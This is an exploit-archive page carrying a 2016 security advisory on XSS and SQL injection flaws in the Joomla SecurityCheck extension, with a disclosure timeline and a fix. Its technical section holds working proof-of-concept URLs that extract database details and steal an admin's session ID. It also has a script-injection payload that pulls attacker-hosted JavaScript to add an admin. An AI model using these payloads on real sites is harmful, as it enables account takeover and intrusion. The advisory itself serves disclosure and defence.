Joomla SecurityCheck 2.8.9 Cross Site Scripting / SQL Injection

Joomla SecurityCheck 2.8.9 Cross Site Scripting / SQL Injection: Posted Jun 1, 2016; Authored by Muhammet Dilmac, Gokmen Guresci; Joomla SecurityCheck component version 2.8.9 suffers from cross site scripting and remote SQL injection vulnerabilities.; tags | exploit, remote, vulnerability, xss, sql injection; SHA-256 | 644ee7776a488493e83ee5ba795c7a55e8e19c6d9eb7ee5b7ae99055ad7d487f; Download | Favorite | View

Joomla SecurityCheck 2.8.9 Cross Site Scripting / SQL Injection

Information
------------------------------
Advisory by ADEO Security Team
Name: Stored XSS and SQL Injection in Joomla SecurityCheck extension
Affected Software : SecurityCheck and SecurityCheck Pro
Vulnerable Versions: 2.8.9 (possibly below)
Vendor Homepage : https://securitycheck.protegetuordenador.com
Vulnerabilities Type : XSS and SQL Injection
Severity : High
Status : Fixed

Technical Details
------------------------------
PoC URLs for SQL Injection

For determining database, user and version.

http://website/index.php?option='or(ExtractValue(1,concat(0x3a,(select(database())))))='1
http://website/index.php?option='or(ExtractValue(1,concat(0x3a,(select(user())))))='1
http://website/index.php?option='or(ExtractValue(1,concat(0x3a,(select(version())))))='1

For steal admin's session ID (If admin is not online, page response with
attack detected string. If online, response with admin's session ID)

http://website/index.php?option='or(ExtractValue(rand(),concat(0x3a,(SELECT
concat(session_id) FROM %23__user_usergroup_map INNER JOIN %23__users ON
%23__user_usergroup_map.user_id=%23__users.id INNER JOIN %23__session ON %
23__users.id=%23__session.userid WHERE group_id=8 LIMIT 0,1))))='1

PoC URLs for XSS

Add a new admin to website silently while admin checking SecurityCheck logs

http://website/index.php?option=<script>var script =
document.createElement('script');script.src = "http://ATTACKER/attack.js
";document.getElementsByTagName('head')[0].appendChild(script);</script>

attack.js
https://gist.github.com/MuhammetDilmac/c680cc921143543561bfdfd7b25da1ca


Disclosure Timeline
------------------------------
24/05/2016 SQL injection found
30/05/2016 Worked on one-shot exploit for SQLi
30/05/2016 While we were working on SQLi payload we also found XSS
31/05/2016 XSS payload prepared
31/05/2016 Vulnerability details and PoC sent to Protegetuordenador
31/05/2016 Vulnerabilities fixed in v2.8.10

Solution
------------------------------
Update to the latest version of SecurityCheck (2.8.10)

Credits
------------------------------
These issues have been discovered by Gokmen Guresci (gokmenguresci.com) and
Muhammet Dilmac (muhammetdilmac.com.tr).

Top Authors In Last 30 Days

Red Hat 179 files
Ubuntu 58 files
Debian 26 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
E1.Coders 4 files
malvuln 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

Joomla SecurityCheck 2.8.9 Cross Site Scripting / SQL Injection

Joomla SecurityCheck 2.8.9 Cross Site Scripting / SQL Injection

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Joomla SecurityCheck 2.8.9 Cross Site Scripting / SQL Injection

Share This

Joomla SecurityCheck 2.8.9 Cross Site Scripting / SQL Injection

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems